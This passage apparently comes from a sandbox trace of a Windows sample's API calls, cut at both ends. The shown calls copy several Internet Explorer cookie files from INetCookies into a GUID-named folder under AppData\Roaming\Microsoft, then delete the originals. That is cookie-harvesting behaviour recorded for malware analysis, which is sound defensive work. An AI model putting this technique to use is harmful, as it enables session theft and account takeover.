lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0251.861] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0251.861] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0251.862] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0251.862] StrChrW (lpStart="Low\\2HYILE1O.txt", wMatch=0x74c005c) returned="\\2HYILE1O.txt" [0251.862] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0251.862] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0251.862] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0251.862] StrChrW (lpStart="2HYILE1O.txt", wMatch=0x74c005c) returned 0x0 [0251.862] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="2HYILE1O.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\2HYILE1O.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\2HYILE1O.txt" [0251.862] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\2HYILE1O.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\2hyile1o.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\2HYILE1O.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\2hyile1o.txt"), bFailIfExists=0) returned 1 [0251.866] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\2HYILE1O.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\2hyile1o.txt")) returned 1 [0251.867] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0251.867] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0251.867] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0251.867] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0251.867] StrChrW (lpStart="Low\\3RW4K76X.txt", wMatch=0x74c005c) returned="\\3RW4K76X.txt" [0251.867] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0251.867] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0251.867] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0251.867] StrChrW (lpStart="3RW4K76X.txt", wMatch=0x74c005c) returned 0x0 [0251.867] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="3RW4K76X.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\3RW4K76X.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\3RW4K76X.txt" [0251.867] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\3RW4K76X.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\3rw4k76x.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\3RW4K76X.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\3rw4k76x.txt"), bFailIfExists=0) returned 1 [0251.873] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\3RW4K76X.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\3rw4k76x.txt")) returned 1 [0251.874] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0251.874] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0251.874] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0251.874] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0251.874] StrChrW (lpStart="Low\\3VVSZ2CO.txt", wMatch=0x74c005c) returned="\\3VVSZ2CO.txt" [0251.874] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0251.874] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0251.875] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0251.875] StrChrW (lpStart="3VVSZ2CO.txt", wMatch=0x74c005c) returned 0x0 [0251.875] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="3VVSZ2CO.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\3VVSZ2CO.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\3VVSZ2CO.txt" [0251.875] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\3VVSZ2CO.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\3vvsz2co.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\3VVSZ2CO.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\3vvsz2co.txt"), bFailIfExists=0) returned 1 [0251.879] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\3VVSZ2CO.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\3vvsz2co.txt")) returned 1 [0251.880] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0251.881] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0251.881] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0251.881] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0251.881] StrChrW (lpStart="Low\\4MN240WN.txt", wMatch=0x74c005c) returned="\\4MN240WN.txt" [0251.881] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0251.881] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0251.881] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0251.881] StrChrW (lpStart="4MN240WN.txt", wMatch=0x74c005c) returned 0x0 [0251.881] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="4MN240WN.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\4MN240WN.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\4MN240WN.txt" [0251.881] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\4MN240WN.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\4mn240wn.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\4MN240WN.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\4mn240wn.txt"), bFailIfExists=0) returned 1 [0251.897] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\4MN240WN.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\4mn240wn.txt")) returned 1 [0251.898] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0251.898] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0251.898] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0251.898] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0251.898] StrChrW (lpStart="Low\\4O6583I0.txt", wMatch=0x74c005c) returned="\\4O6583I0.txt" [0251.898] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0251.898] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0251.898] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0251.898] StrChrW (lpStart="4O6583I0.txt", wMatch=0x74c005c) returned 0x0 [0251.898] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="4O6583I0.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\4O6583I0.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\4O6583I0.txt" [0251.898] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\4O6583I0.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\4o6583i0.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\4O6583I0.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\4o6583i0.txt"), bFailIfExists=0) returned 1 [0251.903] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\4O6583I0.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\4o6583i0.txt")) returned 1 [0251.904] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0251.905] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0251.905] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0251.905] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0251.905] StrChrW (lpStart="Low\\4YWCPPXN.txt", wMatch=0x74c005c) returned="\\4YWCPPXN.txt" [0251.905] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0251.905] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: 